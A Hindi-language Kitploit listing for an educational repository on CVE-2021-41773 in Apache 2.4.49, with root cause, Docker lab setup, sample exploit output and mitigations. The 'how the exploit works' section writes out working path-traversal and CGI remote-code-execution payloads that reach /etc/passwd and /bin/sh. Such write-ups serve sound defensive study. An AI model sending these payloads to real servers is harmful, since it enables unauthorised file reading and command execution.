Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
APACHE-PATH-TRAVERSAL-RCE-CVE-2021-41773- — CVE-2021-41773 (Apache HTTP Server 2.4.49) का व्यापक विश्लेषण, जिसमें भेद्यता अनुसंधान, नियंत्रित प्रयोगशाला-आधारित शोषण, प्रूफ-ऑफ-कॉन्सेप्ट विकास, मूल कारण विश्लेषण, और शैक्षिक तथा रक्षात्मक सुरक्षा उद्देश्यों के लिए शमन रणनीतियाँ शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/abds059/apache-path-traversal-rce-cve-2021-41773-
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubabds059/apache-path-traversal-rce-cve-2021-41773-

APACHE-PATH-TRAVERSAL-RCE-CVE-2021-41773-

CVE-2021-41773 (Apache HTTP Server 2.4.49) का व्यापक विश्लेषण, जिसमें भेद्यता अनुसंधान, नियंत्रित प्रयोगशाला-आधारित शोषण, प्रूफ-ऑफ-कॉन्सेप्ट विकास, मूल कारण विश्लेषण, और शैक्षिक तथा रक्षात्मक सुरक्षा उद्देश्यों के लिए शमन रणनीतियाँ शामिल हैं।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
5 महीने पहलेअभी तक समीक्षित नहीं

CVE-2021-41773 — Apache HTTP Server 2.4.49 पथ ट्रैवर्सल / RCE

Apache CVE CVSS Python Docker Lab Only

शैक्षिक अनुसंधान परियोजना। सभी परीक्षण एक पृथक Docker लैब में किए गए थे। इसका उपयोग किसी भी ऐसी प्रणाली पर न करें जो आपकी नहीं है।


भेद्यता सारांश

फ़ील्डविवरण
CVE IDCVE-2021-41773
प्रभावित सॉफ़्टवेयरकेवल Apache HTTP Server 2.4.49
भेद्यता प्रकारपथ ट्रैवर्सल → रिमोट कोड निष्पादन
CVSS स्कोर9.8 (गंभीर)
खुलासाअक्टूबर 2021
समाधान संस्करणApache 2.4.51

मूल कारण

Apache 2.4.49 एक्सेस नियंत्रण नियम लागू करने से पहले URL-एन्कोडेड पथ अनुक्रमों (%2e%2e) को सही ढंग से सामान्यीकृत करने में विफल रहता है। यह एक हमलावर को वेब रूट से बाहर जाने की अनुमति देता है। जब CGI सक्षम होता है, तो ट्रैवर्सल को /bin/sh की ओर इंगित करके और POST बॉडी के माध्यम से शेल कमांड भेजने पर बिना प्रमाणीकरण के रिमोट कोड निष्पादन होता है।


रिपॉज़िटरी सामग्री

root@kitploit:~
cve-2021-41773-poc/
├── Dockerfile      # Intentionally vulnerable Apache 2.4.49 lab container
├── exploit.py      # Python PoC — uses raw sockets to preserve %2e encoding
├── SETUP.md        # Step-by-step lab setup guide
├── README.md       # This file
└── report.pdf      # Full exploit development report

त्वरित आरंभ

1. संवेदनशील कंटेनर बनाएँ और चलाएँ

root@kitploit:~
docker build -t apache-vuln-2449 .
docker run -d -p 8080:80 --name vuln-apache apache-vuln-2449

2. एक्सप्लॉइट चलाएँ

root@kitploit:~
python3 exploit.py

3. अपेक्षित आउटपुट

root@kitploit:~
==================================================
 CVE-2021-41773 PoC — Lab Use Only
==================================================
[+] Target reachable — HTTP 200

[*] Path Traversal — Reading /etc/passwd
[*] Status: 403
[-] Blocked (403) — server restrictions in place

[*] RCE — Executing: id
[*] Status: 200
[+] OUTPUT:
uid=1(daemon) gid=1(daemon) groups=1(daemon)

[*] RCE — Executing: whoami
[*] Status: 200
[+] OUTPUT:
daemon

[*] RCE — Executing: hostname
[*] Status: 200
[+] OUTPUT:
e4ccca07bee7

पूर्ण सेटअप निर्देशों और समस्या निवारण के लिए SETUP.md देखें।


एक्सप्लॉइट कैसे काम करता है

requests लाइब्रेरी भेजने से पहले %2e → . को सामान्यीकृत कर देती है, जिससे एक्सप्लॉइट विफल हो जाता है (400 लौटता है)। यह PoC HTTP अनुरोध को बाइट-दर-बाइट भेजने के लिए रॉ सॉकेट का उपयोग करता है, जिससे एन्कोडेड ट्रैवर्सल अनुक्रम ठीक उसी रूप में संरक्षित रहता है जैसा Apache 2.4.49 को प्राप्त करने की आवश्यकता होती है।

ट्रैवर्सल पेलोड:

root@kitploit:~
GET /.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1

RCE पेलोड:

root@kitploit:~
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
...
echo Content-Type: text/plain; echo; id

Apache ACL जाँच से पहले %2e%2e को डिकोड करने में विफल रहता है, अनुरोध को संसाधित करता है, उसे CGI के माध्यम से रूट करता है, और POST बॉडी को शेल कमांड के रूप में निष्पादित करता है।


शमन उपाय

  • अपग्रेड करें Apache को 2.4.51 या उसके बाद के संस्करण पर
  • CGI अक्षम करें जब तक कि सख्ती से आवश्यक न हो
  • / पर कभी भी Require all granted का उपयोग न करें
  • सुरक्षा पैच जारी होते ही तुरंत लागू करें

संदर्भ

  • CVE-2021-41773 — MITRE
  • Apache Security Advisory
  • ExploitDB #50383
  • Rapid7 Analysis
  • PayloadsAllTheThings

लेखक

Abdur Rehman Siddiqui
एक्सप्लॉइट विकास — कार्य 3


यह रिपॉज़िटरी केवल शैक्षिक उद्देश्यों के लिए है। लेखक इस सामग्री के किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं है।

टूल डाउनलोड करें